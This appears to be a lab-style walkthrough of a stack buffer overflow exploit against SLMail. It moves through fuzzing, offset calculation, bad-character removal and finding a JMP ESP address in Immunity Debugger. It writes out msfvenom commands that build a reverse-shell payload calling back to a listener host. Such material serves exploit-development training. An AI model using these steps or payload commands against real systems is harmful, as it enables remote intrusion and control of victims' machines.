Simple Buffer Overflow Walkthrough (SLMail example)

  1. running 1_inititalFuzzer.py : program beaks at a payload length of 2700 bit

  2. runing 2_lenCheck.py using different payload sizes Run: 1 - 3000 writes 41414141 in EIP 2 - 4000 writes 41414141 in EIP -> choosing a payload of size 4000

  3. determine the location of the EIP value: 1 - msf-pattern_create -l 4000 2 - use the pattern as payload -> run 3_patternCheck.py 3 - Determine Value in EIP using immunityDebugger -> 39694438 -> 9iD8 - 8Di9 4 - Calculate the offset -> msf-pattern_offset -q 8Di9 -> 2606

  4. Justifying the offset: 1 - running 4_justifyOffset.py immunityDebugger shows 42424242 in EIP

  5. Determine bad characters 1 - running 5_badCharacers.py to determine bad characters -> look in immunityDebugger which char breaks the allChar sequence and delete it in second run Doing this until all bad char are determined -> deleted char in 5_badCharacers_deleted.py --> \x00\x0a\x0d

  6. Find a way to execute shell code 1 - ESP points to the beginnig of the "43434343" part of the payload (4_justifyOffset.py) 2 - Therefore searching for a JMP ESP instruction on a static address: 1 - !mona modules -> no memory protection & address range does not contain bad characters -> Rebase | SafeSEH | ASLR | NXCompact | OS Dll false false false false true 2 - Find JMP ESP instruction in determined dll (module) -> e - 'icon' -> select determined dll and double klick on it -> Loads the beginning of the executable region of the dll -> right klick -> Search for -> Command -> JMP ESP OR right klick -> Search for -> Command sequence -> PUSH ESP \n RETN OR Since the dll is not DEP protected other sections of the dll can also be executed Search outside the executable region of the dll: -> m - 'icon' to check which sections of the ddl are marked as executable -> use mona to find specfic bytes in a memory range -> msf-nasm_shell -> JMP ESP -> op-code: FFE4 -> !mona find -s "\xff\xe4" -m ddlname.dll -> Take one address of the results which does not contain any bad characters -> Justify that address contains JMP ESP: -> "blue arrow black points" - icon -> paste the specific address 3 - replace the "B"-part with the address and set a breakpoint at the address in immunityDebugger (little endian format) -> when program pauses execution, the breakpoint should be reached. -> executing the JMP ESP instruction (next step) by (F7 or "red 90deg error with red dots"-icon) -> EIP shoul now point to the "C" Section of the payload

  7. Including a Payload 1 - Creating Payload using msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.178.73 LPORT=443 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f python 2 - putting a nopsled (some \x90-Bytes) and the Exploit-Code into the script as follows. "A"s + Address + nopsled + exploit + "C"s 3 - start listener according to the exploit 4 - runnig script 7_Exploit-revShell.py 5 - Catching the reverse shell

    The exploit breaks the program flow of SLMail. You get a shell but you can use the exploit only once until someone restarts the software

  8. Get a more stable exploit: 1 - Creating Payload using msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.178.73 LPORT=443 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f python

    2 - Changing the payload of the 7_Exploit script 3 - You now can run the script and catch the shell multiple times without breaking the SLMail program flow